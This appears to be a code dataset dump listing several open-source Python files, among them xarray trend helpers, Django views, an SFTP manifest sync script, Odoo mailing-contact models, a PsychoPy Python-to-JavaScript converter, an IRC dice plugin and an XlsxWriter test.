repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ceos-seo/data_cube_utilities | data_cube_utilities/trend.py | 1 | 2098 | from functools import partial
from itertools import islice, product
import numpy as np
import xarray as xr
def __where_not_nan(arr: np.ndarray):
"""Finds position of not nan values in an nd-array
Args:
arr (numpy.ndarray): nd-array with nan values
Returns:
data (xr.DataArray): nd-array with indices of finite(not nan) values
"""
return np.where(np.isfinite(arr))
def __flatten_shallow(arr):
"""Flattens first two axes of nd-array
Args:
arr (numpy.ndarray): nd-array with dimensions (n, m)
Returns:
arr (numpy.ndarray): nd-array with dimensions (n*m)
"""
# TODO: Done in a hurry, Find numpy native way of resizing
return arr.reshape(arr.shape[0] * arr.shape[1])
def __linear_fit(da: xr.DataArray):
"""Applies linear regression on a 1-D xr.DataArray.
Args:
da (xr.DataArray): 1-D Data-Array being manipulated.
Returns:
data (xr.DataArray): DataArray with a single element(slope of regression).
"""
xs = np.array(list(range(len(da.time))))
ys = __flatten_shallow(da.values)
not_nan = __where_not_nan(ys)[0].astype(int)
xs = xs[not_nan]
ys = ys[not_nan]
pf = np.polyfit(xs,ys, 1)
return xr.DataArray(pf[0])
def linear(da: xr.DataArray):
"""Reduces xarray along a time component. The reduction yields a slope for each spatial coordinate in the xarray.
Args:
da (xr.DataArray): 3-D Data-Array being manipulated. `latitude` and `longitude` are required dimensions.
Returns:
linear_trend_product (xr.DataArray): 2-D Data-Array
"""
# TODO: Decouple from coordinate system, and allow regression along multiple components.
stacked = da.stack(allpoints = ['latitude',
'longitude'])
trend = stacked.groupby('allpoints').apply(__linear_fit)
unstacked = trend.unstack('allpoints')
return unstacked.rename(dict(allpoints_level_0 = "latitude",
allpoints_level_1 = "longitude")) | apache-2.0 | 7,278,287,998,188,780,000 | 28.56338 | 118 | 0.621544 | false | 3.674256 | false | false | false |
pony-revolution/helpothers | helpothers/views.py | 1 | 1239 | from django.contrib.auth import get_user_model
from django.views.generic.base import TemplateView
from django.views.generic.detail import DetailView
from django.views.generic.edit import UpdateView
from .views_mixins import HelpOthersMetaDataMixin
from listings.models import GatheringCenter, Resource
class HomeView(HelpOthersMetaDataMixin, TemplateView):
template_name = 'home.html'
def get_context_data(self, **kwargs):
context = super(HomeView, self).get_context_data(**kwargs)
context['gathering_centers'] = GatheringCenter.objects.filter(published=True)
context['resources'] = Resource.objects.filter(published=True)
return context
class LoginView(HelpOthersMetaDataMixin, TemplateView):
template_name = 'login.html'
def get_context_data(self, **kwargs):
ctx = super(LoginView, self).get_context_data(**kwargs)
ctx['next'] = self.request.GET.get('next')
return ctx
class ProfileView(HelpOthersMetaDataMixin, UpdateView):
context_object_name = 'profile'
template_name = 'accounts/profile.html'
fields = ('user__first_name', 'user__last_name', 'user__email')
def get_object(self, queryset=None):
return self.request.user.profile
| apache-2.0 | -828,806,971,788,788,700 | 34.4 | 85 | 0.727199 | false | 3.812308 | false | false | false |
scattering/ipeek | server/pull_push_expman.py | 1 | 6015 | import glob
import os
import sys
sys.path.append('/var/www/')
sys.path.append('/home/bbm/')
import paramiko
import urllib2, ftplib
import time
import StringIO
import json
DEBUG = False
RETRIEVE_METHOD = "ssh" # or "ftp" or "urllib"
MAX_FTP_RETRIES = 5
HOST_PORT = 22
DEFAULT_PATH = "/usr/local/nice/server_data/experiments/manifest/experiment_manifest.backup"
sources = [
{"name": "NSE",
"host_name": "echo.ncnr.nist.gov"},
{"name": "MAGIK",
"host_name": "magik.ncnr.nist.gov"},
{"name": "NG7",
"host_name": "ng7refl.ncnr.nist.gov"},
{"name": "PBR",
"host_name": "pbr.ncnr.nist.gov"},
{"name": "NGBSANS",
"host_name": "ngbsans.ncnr.nist.gov"},
{"name": "NGB30SANS",
"host_name": "ngb30sans.ncnr.nist.gov"},
{"name": "NG7SANS",
"host_name": "ng7sans.ncnr.nist.gov"},
{"name": "PHADES",
"host_name": "cts.ncnr.nist.gov"},
{"name": "VSANS",
"host_name": "vsans.ncnr.nist.gov"},
]
output = {}
output_filelike = {}
#local_path = "/home/bbm/.livedata/DCS/"
dest_host = "webster.ncnr.nist.gov" #hard-coded
dest_port = 22
# I have a different key for pushing to webster.
dest_pkey = paramiko.RSAKey(filename='/home/bbm/.ssh/datapushkey')
dest_username = "bbm"
def retrieve_ftp(source_host, source_port, file_path, output_buffer, username):
ftp = ftplib.FTP(source_host)
ftp.login('anonymous')
live_datapath = os.path.dirname(file_path)
live_dataname = os.path.basename(file_path)
ftp.cwd(live_datapath)
ftp.retrbinary("RETR " + live_dataname, output_buffer.write)
ftp.close()
def retrieve_ssh(source_host, source_port, file_path, output_buffer, username):
source_transport = paramiko.Transport((source_host, source_port))
source_transport.window_size = 2147483647
source_transport.use_compression(True)
source_pkey = paramiko.RSAKey(filename="/home/bbm/.ssh/datapullkey")
source_username = username
source_transport.connect(username=source_username, pkey = source_pkey)
source_sftp = paramiko.SFTPClient.from_transport(source_transport)
if DEBUG:
print("starting read:", name, os.path.basename(file_path))
f = source_sftp.open(file_path)
response = f.read()
f.close()
if DEBUG:
print("ending read:", name, os.path.basename(file_path))
output_buffer.write(response)
if DEBUG:
print("ending stringIO:", name, os.path.basename(file_path))
def retrieve_urllib(source_host, source_port, file_path, output_buffer, username):
req_addr = os.path.join("ftp://" + source_host, live_datapath, live_dataname)
#req = urllib2.Request(req_addr)
response = None
retries = 0
while retries < MAX_FTP_RETRIES:
try:
response = urllib2.urlopen(req_addr)
break
except:
print("failed attempt %d to retrieve %s: trying again" % (retries, req_addr))
retries += 1
if response is None: return
if DEBUG:
print("retrieved %s" % (req_addr))
output_buffer.write(response.read())
retrievers = {
"ssh": retrieve_ssh,
"urllib": retrieve_urllib,
"ftp": retrieve_ftp
}
def strip_header(manifest):
json_start = manifest.find('[')
return manifest[json_start:]
def strip_emails(manifest):
manifest_obj = json.loads(manifest)
for expt in manifest_obj:
expt['value']['value'].pop('emails', None)
return json.dumps(manifest_obj)
def strip_emails_and_proprietary(manifest):
manifest_obj = json.loads(manifest)
for i, expt in enumerate(manifest_obj):
if expt['value']['value'].get('publish', '') != 'NORMAL':
manifest_obj.pop(i)
else:
expt['value']['value'].pop('emails', None)
return json.dumps(manifest_obj)
filters = [strip_header, strip_emails_and_proprietary]
for source in sources:
retrieve_method = source.get('retrieve_method', RETRIEVE_METHOD)
name = source['name']
username = source.get('username', 'ncnr')
source_host = source['host_name']
source_port = source.get('host_port', HOST_PORT)
live_datapath = source.get('manifest_path', DEFAULT_PATH)
try:
live_data = StringIO.StringIO()
retriever = retrievers.get(retrieve_method, lambda *args: None)
retriever(source_host, source_port, live_datapath, live_data, username)
live_data.seek(0) # move back to the beginning of file
output.setdefault(name, {})
filename = os.path.basename(live_datapath)
result = live_data.read()
for f in filters:
result = f(result)
output[name][filename] = result
except Exception as e:
if DEBUG:
print "could not connect to %s because of %s\n" % (name,str(e))
# Now initialize the transfer to the destination:
dest_transport = paramiko.Transport((dest_host, dest_port))
dest_transport.connect(username = dest_username, pkey = dest_pkey)
dest_transport.window_size = 2147483647
dest_transport.use_compression(True)
dest_sftp = paramiko.SFTPClient.from_transport(dest_transport)
for name in output:
#name = source['name']
for json_filename in output[name].keys():
# now I push that file outside the firewall to webster:
remote_tmp = os.path.join('ipeek_html', 'data', name, json_filename + ".tmp")
remotedir = os.path.join('ipeek_html', 'data', name)
remotepath = os.path.join('ipeek_html', 'data', name, json_filename)
if DEBUG:
print "starting write:", name, json_filename
f = dest_sftp.open(remote_tmp, 'w')
f.write(output[name][json_filename])
f.close()
if json_filename in dest_sftp.listdir(remotedir):
dest_sftp.unlink(remotepath)
dest_sftp.rename(remote_tmp, remotepath)
if DEBUG:
print "ending write:", name, json_filename
dest_sftp.close()
dest_transport.close()
#print 'Upload done.'
| unlicense | 4,076,488,242,616,512,000 | 33.371429 | 92 | 0.635411 | false | 3.317705 | false | false | false |
jrichte43/ProjectEuler | Problem-0121/solutions.py | 1 | 1722 |
__problem_title__ = "Disc game prize fund"
__problem_url___ = "https://projecteuler.net/problem=121"
__problem_description__ = "A bag contains one red disc and one blue disc. In a game of chance a " \
"player takes a disc at random and its colour is noted. After each " \
"turn the disc is returned to the bag, an extra red disc is added, and " \
"another disc is taken at random. The player pays £1 to play and wins " \
"if they have taken more blue discs than red discs at the end of the " \
"game. If the game is played for four turns, the probability of a " \
"player winning is exactly 11/120, and so the maximum prize fund the " \
"banker should allocate for winning in this game would be £10 before " \
"they would expect to incur a loss. Note that any payout will be a " \
"whole number of pounds and also includes the original £1 paid to play " \
"the game, so in the example given the player actually wins £9. Find " \
"the maximum prize fund that should be allocated to a single game in " \
"which fifteen turns are played."
import timeit
class Solution():
@staticmethod
def solution1():
pass
@staticmethod
def time_solutions():
setup = 'from __main__ import Solution'
print('Solution 1:', timeit.timeit('Solution.solution1()', setup=setup, number=1))
if __name__ == '__main__':
s = Solution()
print(s.solution1())
s.time_solutions()
| gpl-3.0 | 5,942,483,616,002,205,000 | 45.432432 | 100 | 0.5617 | false | 4.338384 | false | false | false |
gurneyalex/odoo | addons/mass_mailing/models/mailing_contact.py | 5 | 5454 | # -*- coding: utf-8 -*-
# Part of Odoo. See LICENSE file for full copyright and licensing details.
from odoo import api, fields, models
from odoo.osv import expression
class MassMailingContactListRel(models.Model):
""" Intermediate model between mass mailing list and mass mailing contact
Indicates if a contact is opted out for a particular list
"""
_name = 'mailing.contact.subscription'
_description = 'Mass Mailing Subscription Information'
_table = 'mailing_contact_list_rel'
_rec_name = 'contact_id'
contact_id = fields.Many2one('mailing.contact', string='Contact', ondelete='cascade', required=True)
list_id = fields.Many2one('mailing.list', string='Mailing List', ondelete='cascade', required=True)
opt_out = fields.Boolean(string='Opt Out',
help='The contact has chosen not to receive mails anymore from this list', default=False)
unsubscription_date = fields.Datetime(string='Unsubscription Date')
message_bounce = fields.Integer(related='contact_id.message_bounce', store=False, readonly=False)
is_blacklisted = fields.Boolean(related='contact_id.is_blacklisted', store=False, readonly=False)
_sql_constraints = [
('unique_contact_list', 'unique (contact_id, list_id)',
'A contact cannot be subscribed multiple times to the same list!')
]
@api.model
def create(self, vals):
if 'opt_out' in vals:
vals['unsubscription_date'] = vals['opt_out'] and fields.Datetime.now()
return super(MassMailingContactListRel, self).create(vals)
def write(self, vals):
if 'opt_out' in vals:
vals['unsubscription_date'] = vals['opt_out'] and fields.Datetime.now()
return super(MassMailingContactListRel, self).write(vals)
class MassMailingContact(models.Model):
"""Model of a contact. This model is different from the partner model
because it holds only some basic information: name, email. The purpose is to
be able to deal with large contact list to email without bloating the partner
base."""
_name = 'mailing.contact'
_inherit = ['mail.thread.blacklist']
_description = 'Mailing Contact'
_order = 'email'
name = fields.Char()
company_name = fields.Char(string='Company Name')
title_id = fields.Many2one('res.partner.title', string='Title')
email = fields.Char('Email')
list_ids = fields.Many2many(
'mailing.list', 'mailing_contact_list_rel',
'contact_id', 'list_id', string='Mailing Lists')
subscription_list_ids = fields.One2many('mailing.contact.subscription', 'contact_id', string='Subscription Information')
country_id = fields.Many2one('res.country', string='Country')
tag_ids = fields.Many2many('res.partner.category', string='Tags')
opt_out = fields.Boolean('Opt Out', compute='_compute_opt_out', search='_search_opt_out',
help='Opt out flag for a specific mailing list.'
'This field should not be used in a view without a unique and active mailing list context.')
@api.model
def _search_opt_out(self, operator, value):
# Assumes operator is '=' or '!=' and value is True or False
if operator != '=':
if operator == '!=' and isinstance(value, bool):
value = not value
else:
raise NotImplementedError()
if 'default_list_ids' in self._context and isinstance(self._context['default_list_ids'], (list, tuple)) and len(self._context['default_list_ids']) == 1:
[active_list_id] = self._context['default_list_ids']
contacts = self.env['mailing.contact.subscription'].search([('list_id', '=', active_list_id)])
return [('id', 'in', [record.contact_id.id for record in contacts if record.opt_out == value])]
else:
return expression.FALSE_DOMAIN if value else expression.TRUE_DOMAIN
@api.depends('subscription_list_ids')
def _compute_opt_out(self):
if 'default_list_ids' in self._context and isinstance(self._context['default_list_ids'], (list, tuple)) and len(self._context['default_list_ids']) == 1:
[active_list_id] = self._context['default_list_ids']
for record in self:
active_subscription_list = record.subscription_list_ids.filtered(lambda l: l.list_id.id == active_list_id)
record.opt_out = active_subscription_list.opt_out
else:
for record in self:
record.opt_out = False
def get_name_email(self, name):
name, email = self.env['res.partner']._parse_partner_name(name)
if name and not email:
email = name
if email and not name:
name = email
return name, email
@api.model
def name_create(self, name):
name, email = self.get_name_email(name)
contact = self.create({'name': name, 'email': email})
return contact.name_get()[0]
@api.model
def add_to_list(self, name, list_id):
name, email = self.get_name_email(name)
contact = self.create({'name': name, 'email': email, 'list_ids': [(4, list_id)]})
return contact.name_get()[0]
def _message_get_default_recipients(self):
return {r.id: {
'partner_ids': [],
'email_to': r.email_normalized,
'email_cc': False}
for r in self
}
| agpl-3.0 | 5,388,405,574,171,539,000 | 44.831933 | 160 | 0.632013 | false | 3.915291 | false | false | false |
dannywxh/mypy | spider/avso.py | 1 | 5739 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import os, re, time, sys
from bs4 import BeautifulSoup
import common
import requests
reload(sys)
#print sys.getdefaultencoding()
sys.setdefaultencoding('utf-8')
print sys.getdefaultencoding()
def download_html(url):
headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Encoding': 'gzip, deflate, compress',
'Accept-Language': 'en-us;q=0.5,en;q=0.3',
'Cache-Control': 'max-age=0',
'Connection': 'keep-alive',
'User-Agent': 'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:22.0) Gecko/20100101 Firefox/22.0'}
print "download from "+url+"\n"
response = requests.get(url=url,headers=headers,timeout=5) # 最基本的GET请求
#print "status_code",response.status_code
if response.ok:
#print response.content.encode("gbk")
#return StringIO.StringIO(response.content)
data=response.content
return data
#####以下处理 avso ,可以封装成一个类 #################
def get_cast_onepage_by_avso(cast_name,pagecount=1):
url=r'https://avso.pw/cn/search/'+cast_name+'/page/'+str(pagecount)
data=download_html(url)
if data:
#print response.content.encode("gbk")
soup = BeautifulSoup(data,"html.parser")
ret=[]
try:
notfound=soup.find('div',clasas_="alert alert-danger")
if notfound!=None:
print "Not Found!"
return -1
divs=soup.find_all('div',class_="item")
if divs==None:
print "divs is None!"
return
for div in divs:
info=div.find('div',class_="photo-info")
name=div.find('span')
#print name.text
datas=info.find_all('date')
ret.append((name.text,datas[0].text,datas[1].text))
return ret
except Exception,e:
print e
return -1
#print "vcast not found!"
def get_cast_allpage_by_avso(cast_name):
all_info=[]
for i in range(1,10):
info= get_cast_onepage_by_avso(cast_name,i)
if info==-1:
break
else:
all_info+=info
print all_info
savefile="d:\\"+cast_name+".txt"
with open(savefile,"w") as fs:
for name,vid,date in all_info:
fs.write(name.encode("utf-8")+"\t"+vid+"\t"+date+"\n")
print "file create done!"
# step:1
def serch_movie_byvid(vid):
url='https://avso.pw/cn/search/'+vid
#url='https://avso.pw/cn/search/'+vid #110615_185'
data=download_html(url)
if data:
#print response.content.encode("gbk")
soup = BeautifulSoup(data,"lxml")
ret=[]
try:
notfound=soup.find('div',class_="alert alert-danger")
if notfound!=None:
print "Not Found!"
return -1
types = soup.select('div.item > a')
items = soup.select('div.item > a > div.photo-info > span')
for a,item in zip(types,items):
#print a['class'][1],a['href'],item.get_text() # ['movie-box', 'mcaribbeancom']
cast=get_movie_cast(a['href'])
ret.append((item.get_text(),cast,a['class'][1]))
return ret
except Exception,e:
print e
return -1
#print "vcast not found!"
#step 2:得到片子的所有演员名
def get_movie_cast(url):
# url=r' https://avso.pw/cn/movie/yus'
data=download_html(url)
ret=[]
if data:
soup = BeautifulSoup(data,"lxml")
try:
notfound=soup.find('div',clasas_="alert alert-danger")
if notfound!=None:
print "Not Found!"
return -1
actress=soup.find_all('a',class_="avatar-box")
for a in actress:
span=a.find("span")
ret.append(span.text)
return " ".join(ret)
except Exception,e:
print e
return -1
#print "vcast not found!"
#wrapper function
def get_vidlist_full_info():
#idlist=['082516-001','080117_01','062717_110']
idlist= walkpath(r"e:\\avstore")
print idlist
infos=[]
for id in idlist:
info = serch_movie_byvid(id)
if info!=-1:
infos+=info
#print infos
infofile='d:\\info.txt'
with open(infofile,"w") as f:
for a,b,c in infos:
print a,b,c
f.write(a+","+b+","+c+"\n")
print "File saved!%s"%infofile
def walkpath(path):
files=[x for x in os.listdir(path) if all([os.path.splitext(x)[1]=='.txt', not os.path.isdir(path+"\\"+x)])]
store=[]
for txtfile in files:
for line in open(path+"/"+txtfile):
p,f=os.path.split(line)
id=common.format_rule1(f.replace("\n",""))
if id!="":
#store.append((id,txtfile))
store.append(id)
return store
if __name__ == '__main__' :
#TXT_STORE_PATH="d:\\avstore\\"
get_vidlist_full_info()
# idlist=['082516-001','080117_01','062717_110']
#ret=serch_movie_byvid('082516-001')
#for a,b,c in ret:
# print a,b,c
| apache-2.0 | 8,082,208,100,537,435,000 | 24.361607 | 112 | 0.492871 | false | 3.528571 | false | false | false |
psychopy/psychopy | psychopy/experiment/py2js.py | 1 | 7669 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
# Part of the PsychoPy library
# Copyright (C) 2002-2018 Jonathan Peirce (C) 2019-2021 Open Science Tools Ltd.
# Distributed under the terms of the GNU General Public License (GPL).
"""Converting code parameters and components from python (PsychoPy)
to JS (ES6/PsychoJS)
"""
import ast
import astunparse
import esprima
from os import path
from psychopy.constants import PY3
from psychopy import logging
if PY3:
from past.builtins import unicode
from io import StringIO
else:
from StringIO import StringIO
from psychopy.experiment.py2js_transpiler import translatePythonToJavaScript
class NamesJS(dict):
def __getitem__(self, name):
try:
return dict.__getitem__(self, name)
except:
return "{}".format(name)
namesJS = NamesJS()
namesJS['sin'] = 'Math.sin'
namesJS['cos'] = 'Math.cos'
namesJS['tan'] = 'Math.tan'
namesJS['pi'] = 'Math.PI'
namesJS['rand'] = 'Math.random'
namesJS['random'] = 'Math.random'
namesJS['sqrt'] = 'Math.sqrt'
namesJS['abs'] = 'Math.abs'
namesJS['randint'] = 'util.randint'
namesJS['round'] = 'util.round' # better than Math.round, supports n DPs arg
namesJS['sum'] = 'util.sum'
class TupleTransformer(ast.NodeTransformer):
""" An ast subclass that walks the abstract syntax tree and
allows modification of nodes.
This class transforms a tuple to a list.
:returns node
"""
def visit_Tuple(self, node):
return ast.List(node.elts, node.ctx)
class Unparser(astunparse.Unparser):
"""astunparser had buried the future_imports option underneath its init()
so we need to override that method and change it."""
def __init__(self, tree, file):
"""Unparser(tree, file=sys.stdout) -> None.
Print the source for tree to file."""
self.f = file
self.future_imports = ['unicode_literals']
self._indent = 0
self.dispatch(tree)
self.f.flush()
def unparse(tree):
v = StringIO()
Unparser(tree, file=v)
return v.getvalue()
def expression2js(expr):
"""Convert a short expression (e.g. a Component Parameter) Python to JS"""
# if the code contains a tuple (anywhere), convert parenths to be list.
# This now works for compounds like `(2*(4, 5))` where the inner
# parenths becomes a list and the outer parens indicate priority.
# This works by running an ast transformer class to swap the contents of the tuple
# into a list for the number of tuples in the expression.
try:
syntaxTree = ast.parse(expr)
except Exception:
try:
syntaxTree = ast.parse(unicode(expr))
except Exception as err:
logging.error(err)
return
for node in ast.walk(syntaxTree):
TupleTransformer().visit(node) # Transform tuples to list
# for py2 using 'unicode_literals' we don't want
if isinstance(node, ast.Str) and type(node.s)==bytes:
node.s = unicode(node.s, 'utf-8')
elif isinstance(node, ast.Str) and node.s.startswith("u'"):
node.s = node.s[1:]
if isinstance(node, ast.Name):
if node.id == 'undefined':
continue
node.id = namesJS[node.id]
jsStr = unparse(syntaxTree).strip()
if not any(ch in jsStr for ch in ("=",";","\n")):
try:
jsStr = translatePythonToJavaScript(jsStr)
if jsStr.endswith(';\n'):
jsStr = jsStr[:-2]
except:
# If translation fails, just use old translation
pass
return jsStr
def snippet2js(expr):
"""Convert several lines (e.g. a Code Component) Python to JS"""
# for now this is just adding ';' onto each line ending so will fail on
# most code (e.g. if... for... will certainly fail)
# do nothing for now
return expr
def findUndeclaredVariables(ast, allUndeclaredVariables):
"""Detect undeclared variables
"""
undeclaredVariables = []
for expression in ast:
if expression.type == 'ExpressionStatement':
expression = expression.expression
if expression.type == 'AssignmentExpression' and expression.operator == '=' and expression.left.type == 'Identifier':
variableName = expression.left.name
if variableName not in allUndeclaredVariables:
undeclaredVariables.append(variableName)
allUndeclaredVariables.append(variableName)
elif expression.type == 'IfStatement':
if expression.consequent.body is None:
consequentVariables = findUndeclaredVariables(
[expression.consequent], allUndeclaredVariables)
else:
consequentVariables = findUndeclaredVariables(
expression.consequent.body, allUndeclaredVariables)
undeclaredVariables.extend(consequentVariables)
elif expression.type == "ReturnStatement":
if expression.argument.type == "FunctionExpression":
consequentVariables = findUndeclaredVariables(
expression.argument.body.body, allUndeclaredVariables)
undeclaredVariables.extend(consequentVariables)
return undeclaredVariables
def addVariableDeclarations(inputProgram, fileName):
"""Transform the input program by adding just before each function
a declaration for its undeclared variables
"""
# parse Javascript code into abstract syntax tree:
# NB: esprima: https://media.readthedocs.org/pdf/esprima/4.0/esprima.pdf
try:
ast = esprima.parseScript(inputProgram, {'range': True, 'tolerant': True})
except esprima.error_handler.Error as err:
logging.error("{0} in {1}".format(err, path.split(fileName)[1]))
return inputProgram # So JS can be written to file
# find undeclared vars in functions and declare them before the function
outputProgram = inputProgram
offset = 0
allUndeclaredVariables = []
for expression in ast.body:
if expression.type == 'FunctionDeclaration':
# find all undeclared variables:
undeclaredVariables = findUndeclaredVariables(expression.body.body,
allUndeclaredVariables)
# add declarations (var) just before the function:
funSpacing = ['', '\n'][len(undeclaredVariables) > 0] # for consistent function spacing
declaration = funSpacing + '\n'.join(['var ' + variable + ';' for variable in
undeclaredVariables]) + '\n'
startIndex = expression.range[0] + offset
outputProgram = outputProgram[
:startIndex] + declaration + outputProgram[
startIndex:]
offset += len(declaration)
return outputProgram
if __name__ == '__main__':
for expr in ['sin(t)', 't*5',
'(3, 4)', '(5*-2)', # tuple and not tuple
'(1,(2,3), (1,2,3), (-4,-5,-6))', '2*(2, 3)', # combinations
'[1, (2*2)]', # List with nested operations returns list + nested tuple
'(.7, .7)', # A tuple returns list
'(-.7, .7)', # A tuple with unary operators returns nested lists
'[-.7, -.7]', # A list with unary operators returns list with nested tuple
'[-.7, (-.7 * 7)]']: # List with unary operators and nested tuple with operations returns list + tuple
print("{} -> {}".format(repr(expr), repr(expression2js(expr))))
| gpl-3.0 | 7,784,150,697,449,166,000 | 36.778325 | 129 | 0.61716 | false | 4.154388 | false | false | false |
exp-publishing/cloudbot-plugins | plugins/gaming.py | 1 | 4430 | """
gaming.py
Dice, coins, and random generation for gaming.
Modified By:
- Luke Rogers <https://github.com/lukeroge>
- Josh Elsasser <https://github.com/jaelsasser>
License:
GPL v3
"""
import asyncio
import random
import re
from cloudbot import hook
whitespace_re = re.compile(r'\s+')
valid_diceroll = re.compile(r'^([+-]?(?:\d+|\d*d(?:\d+|F))(?:[+-](?:\d+|\d*d(?:\d+|F)))*)( .+)?$', re.I)
sign_re = re.compile(r'[+-]?(?:\d*d)?(?:\d+|F)', re.I)
split_re = re.compile(r'([\d+-]*)d?(F|\d*)', re.I)
def n_rolls(count, n):
"""roll an n-sided die count times
:type count: int
:type n: int | str
"""
if n == "F":
return [random.randint(-1, 1) for x in range(min(count, 100))]
if n < 2: # it's a coin
if count < 100:
return [random.randint(0, 1) for x in range(count)]
else: # fake it
return [int(random.normalvariate(.5 * count, (.75 * count) ** .5))]
else:
if count < 100:
return [random.randint(1, n) for x in range(count)]
else: # fake it
return [int(random.normalvariate(.5 * (1 + n) * count,
(((n + 1) * (2 * n + 1) / 6. -
(.5 * (1 + n)) ** 2) * count) ** .5))]
@asyncio.coroutine
@hook.command("roll", "dice")
def dice(text, notice):
"""<dice roll> - simulates dice rolls. Example: 'dice 2d20-d5+4 roll 2': D20s, subtract 1D5, add 4
:type text: str
"""
if hasattr(text, "groups"):
text, desc = text.groups()
else: # type(text) == str
match = valid_diceroll.match(whitespace_re.sub("", text))
if match:
text, desc = match.groups()
else:
notice("Invalid dice roll '{}'".format(text))
return
if "d" not in text:
return
spec = whitespace_re.sub('', text)
if not valid_diceroll.match(spec):
notice("Invalid dice roll '{}'".format(text))
return
groups = sign_re.findall(spec)
total = 0
rolls = []
for roll in groups:
count, side = split_re.match(roll).groups()
count = int(count) if count not in " +-" else 1
if side.upper() == "F": # fudge dice are basically 1d3-2
for fudge in n_rolls(count, "F"):
if fudge == 1:
rolls.append("\x033+\x0F")
elif fudge == -1:
rolls.append("\x034-\x0F")
else:
rolls.append("0")
total += fudge
elif side == "":
total += count
else:
side = int(side)
try:
if count > 0:
d = n_rolls(count, side)
rolls += list(map(str, d))
total += sum(d)
else:
d = n_rolls(-count, side)
rolls += [str(-x) for x in d]
total -= sum(d)
except OverflowError:
# I have never seen this happen. If you make this happen, you win a cookie
return "Thanks for overflowing a float, jerk >:["
if desc:
return "{}: {} ({})".format(desc.strip(), total, ", ".join(rolls))
else:
return "{} ({})".format(total, ", ".join(rolls))
@asyncio.coroutine
@hook.command("choice", "choose")
def choose(text, notice):
"""<choice1>, [choice2], [choice3], etc. - randomly picks one of the given choices
:type text: str
"""
choices = re.findall(r'([^,]+)', text)
if len(choices) == 1:
notice(choose.__doc__)
return
return random.choice(choices)
@asyncio.coroutine
@hook.command(autohelp=False)
def coin(text, notice, action):
"""[amount] - flips [amount] coins
:type text: str
"""
if text:
try:
amount = int(text)
except (ValueError, TypeError):
notice("Invalid input '{}': not a number".format(text))
return
else:
amount = 1
if amount == 1:
action("flips a coin and gets {}.".format(random.choice(["heads", "tails"])))
elif amount == 0:
action("makes a coin flipping motion")
else:
heads = int(random.normalvariate(.5 * amount, (.75 * amount) ** .5))
tails = amount - heads
action("flips {} coins and gets {} heads and {} tails.".format(amount, heads, tails))
| gpl-3.0 | 6,135,678,696,273,625,000 | 28.932432 | 104 | 0.499774 | false | 3.485445 | false | false | false |
ivmech/iviny-scope | lib/xlsxwriter/test/comparison/test_outline04.py | 1 | 2728 | ###############################################################################
#
# Tests for XlsxWriter.
#
# Copyright (c), 2013, John McNamara, [email protected]
#
import unittest
import os
from ...workbook import Workbook
from ..helperfunctions import _compare_xlsx_files
class TestCompareXLSXFiles(unittest.TestCase):
"""
Test file created by XlsxWriter against a file created by Excel.
"""
def setUp(self):
self.maxDiff = None
filename = 'outline04.xlsx'
test_dir = 'xlsxwriter/test/comparison/'
self.got_filename = test_dir + '_test_' + filename
self.exp_filename = test_dir + 'xlsx_files/' + filename
self.ignore_files = ['xl/calcChain.xml', '[Content_Types].xml', 'xl/_rels/workbook.xml.rels']
self.ignore_elements = {}
def test_create_file(self):
"""
Test the creation of a outlines in a XlsxWriter file. These tests are
based on the outline programs in the examples directory.
"""
filename = self.got_filename
####################################################
workbook = Workbook(filename)
worksheet4 = workbook.add_worksheet('Outline levels')
levels = [
"Level 1", "Level 2", "Level 3", "Level 4", "Level 5", "Level 6",
"Level 7", "Level 6", "Level 5", "Level 4", "Level 3", "Level 2",
"Level 1"]
worksheet4.write_column('A1', levels)
worksheet4.set_row(0, None, None, {'level': 1})
worksheet4.set_row(1, None, None, {'level': 2})
worksheet4.set_row(2, None, None, {'level': 3})
worksheet4.set_row(3, None, None, {'level': 4})
worksheet4.set_row(4, None, None, {'level': 5})
worksheet4.set_row(5, None, None, {'level': 6})
worksheet4.set_row(6, None, None, {'level': 7})
worksheet4.set_row(7, None, None, {'level': 6})
worksheet4.set_row(8, None, None, {'level': 5})
worksheet4.set_row(9, None, None, {'level': 4})
worksheet4.set_row(10, None, None, {'level': 3})
worksheet4.set_row(11, None, None, {'level': 2})
worksheet4.set_row(12, None, None, {'level': 1})
workbook.close()
####################################################
got, exp = _compare_xlsx_files(self.got_filename,
self.exp_filename,
self.ignore_files,
self.ignore_elements)
self.assertEqual(got, exp)
def tearDown(self):
# Cleanup.
if os.path.exists(self.got_filename):
os.remove(self.got_filename)
if __name__ == '__main__':
unittest.main()
| gpl-3.0 | -6,489,329,900,518,712,000 | 31.47619 | 101 | 0.522727 | false | 3.783634 | true | false | false |
prasunroypr/digit-recognizer | source/defs.py | 1 | 6607 | ################################################################################
"""
Functions for Digit Recognition
Created on Wed Jun 01 00:00:00 2016
@author: Prasun Roy
@e-mail: [email protected]
"""
################################################################################
# import modules
import matplotlib.pyplot as pplt
import numpy as np
import os
import pandas as pd
import skimage.feature as skim
import sklearn.preprocessing as pp
import time
from conf import _config
from conf import _configinfo
################################################################################
def _fscale(data, split=False, load=False, verbose=False):
# initialize scaler
scaler = pp.MinMaxScaler()
# initialize variables
config = _configinfo()
sdpath = config['root_data_path'] + 'scaled.npy'
# scale data
if verbose: print('scaling features............... ', end = '')
data = np.array(data, dtype='float64')
if load and os.path.isfile(sdpath):
m = np.load(sdpath)[0]
r = np.load(sdpath)[1]
r[r==0] = 1
data = (data - m) / r
elif split:
train = data[:config['train_d']]
valid = data[config['train_d']:]
scaler.fit(train)
m = scaler.data_min_
r = scaler.data_range_
train = scaler.transform(train)
valid = scaler.transform(valid)
data = np.vstack((train, valid))
else:
data = scaler.fit_transform(data)
m = scaler.data_min_
r = scaler.data_range_
if verbose: print('done')
# save scaled config
if not load: np.save(sdpath, np.vstack((m, r)))
# return scaled data
return data
################################################################################
def _haar(data, load=True, save=False, verbose=False):
return data
################################################################################
